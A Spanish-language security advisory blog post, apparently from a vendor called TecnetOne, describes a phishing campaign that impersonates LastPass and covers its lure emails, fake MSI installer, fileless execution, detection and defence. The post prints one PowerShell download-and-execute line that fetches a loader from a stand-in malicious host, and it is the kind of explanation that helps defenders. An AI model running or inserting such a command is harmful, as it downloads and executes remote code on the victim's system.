Si usas LastPass para gestionar tus contraseñas, debes estar alerta: una nueva campaña de phishing está circulando con correos falsos que simulan ser notificaciones oficiales de la compañía. Estos mensajes aseguran que tu cuenta ha sido comprometida y te piden descargar una supuesta “actualización de seguridad” para restaurar el acceso.
El problema es que ese archivo no soluciona nada. En realidad, instala malware en tu equipo capaz de robar credenciales, registrar tus pulsaciones de teclado y propagarse por la red. La amenaza, activa desde principios de octubre, ya ha afectado a múltiples usuarios y empresas en todo el mundo.
En TecnetOne te contamos cómo funciona este fraude, qué señales debes observar y qué medidas puedes tomar para proteger tus datos y sistemas.
Los mensajes fraudulentos están diseñados para parecer legítimos. Usan el logotipo, los colores corporativos y un tono de urgencia que busca provocar una reacción rápida. El asunto suele ser algo como:
“Tu cuenta de LastPass ha sido vulnerada. Descarga esta actualización urgente.”
Dentro del correo, los atacantes incluyen enlaces que aparentan dirigir a dominios auténticos de LastPass, pero si los analizas con atención, notarás pequeñas variaciones en las direcciones (por ejemplo, letras duplicadas o dominios poco comunes como “.support-secure.com”).
Cuando haces clic, el enlace redirige a un servidor controlado por los atacantes, donde se aloja un archivo comprimido llamado “LastPass_Security_Update.zip”.
Ese ZIP contiene un archivo ejecutable con apariencia de instalador legítimo (con extensión .MSI), pero al ejecutarlo descarga malware en segundo plano.
Una vez que el usuario ejecuta el falso instalador, el malware inicia una cadena de acciones automatizadas:
El comando que utilizan para iniciar la infección es una línea de PowerShell altamente ofuscada, como esta:
IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')
Este código se ejecuta en memoria, sin escribir nada en disco, lo que le permite evadir la detección de muchos antivirus tradicionales.
Conoce más: Alerta: Falsa app de LastPass en App Store
El ataque es especialmente sofisticado porque aprovecha un método de ejecución sin archivos (fileless), lo que lo hace más difícil de detectar.
En lugar de guardar scripts o ejecutables visibles, carga el código directamente en la memoria del sistema, evitando así las alertas de seguridad comunes.
Además, el malware se mantiene activo al inyectarse en procesos legítimos de Windows, como svchost.exe.
Esta técnica, conocida como DLL injection, le permite operar con permisos elevados y ejecutar tareas sin levantar sospechas.
En entornos corporativos, el impacto puede ser grave: el malware puede moverse lateralmente a través de la red, comprometiendo otros equipos o servidores.
Los correos fraudulentos de esta campaña son visualmente convincentes, pero si prestas atención, hay señales claras para identificarlos:
Correo electrónico de phishing (Fuente: LastPass)
Desde TecnetOne, te recomendamos seguir estas medidas para mantenerte protegido frente a este tipo de ataques:
Si recibes un correo que dice venir de LastPass (o de cualquier otro servicio), no abras los archivos ni hagas clic en los enlaces. Accede manualmente al sitio oficial escribiendo la dirección en el navegador.
Los atacantes suelen usar direcciones falsas que parecen auténticas. Si algo no encaja, comprueba la autenticidad antes de actuar.
Si alguien logra obtener tu contraseña, el MFA puede evitar que acceda a tus cuentas.
Los administradores de TI deben vigilar el uso de PowerShell, revisar las tareas programadas y analizar conexiones a servidores desconocidos.
Un antivirus tradicional puede no detectar estos ataques fileless. Es mejor optar por herramientas con detección en memoria y análisis de comportamiento, como las que ofrecen tecnologías EDR (Endpoint Detection & Response).
Si descargaste el archivo o ejecutaste el instalador, cambia tus contraseñas inmediatamente desde otro dispositivo limpio y notifica a tu equipo de seguridad.
Lee más: LastPass Alerta Sobre Gestores de Contraseñas Falsos
Los ataques de phishing corporativo como este se han vuelto más frecuentes y sofisticados. Los ciberdelincuentes saben que la confianza en marcas reconocidas (como LastPass, Microsoft o Adobe) aumenta la efectividad del engaño.
En un entorno empresarial, basta con que un solo empleado caiga en la trampa para comprometer toda la red interna. Por eso, las compañías deben:
En TecnetOne ayudamos a las empresas a detectar y bloquear campañas de phishing antes de que lleguen al usuario final, utilizando tecnologías de análisis de comportamiento, inteligencia de amenazas y protección basada en IA.
El caso de los falsos correos de LastPass demuestra que el phishing sigue siendo una de las armas más efectivas de los ciberdelincuentes.
No importa qué tan sofisticadas sean las soluciones tecnológicas: el factor humano sigue siendo el punto más vulnerable.
Antes de hacer clic, tómate unos segundos para verificar la fuente. Esa simple precaución puede evitar la pérdida de información, el robo de credenciales y el acceso no autorizado a tus sistemas.
Recuerda: LastPass nunca te pedirá instalar actualizaciones manuales ni enviará archivos adjuntos por correo electrónico.
Si recibes un mensaje sospechoso, repórtalo y elimina el correo sin abrirlo.
En TecnetOne, nuestro compromiso es ayudarte a construir una cultura de seguridad digital sólida, donde cada persona sea la primera línea de defensa frente a las amenazas.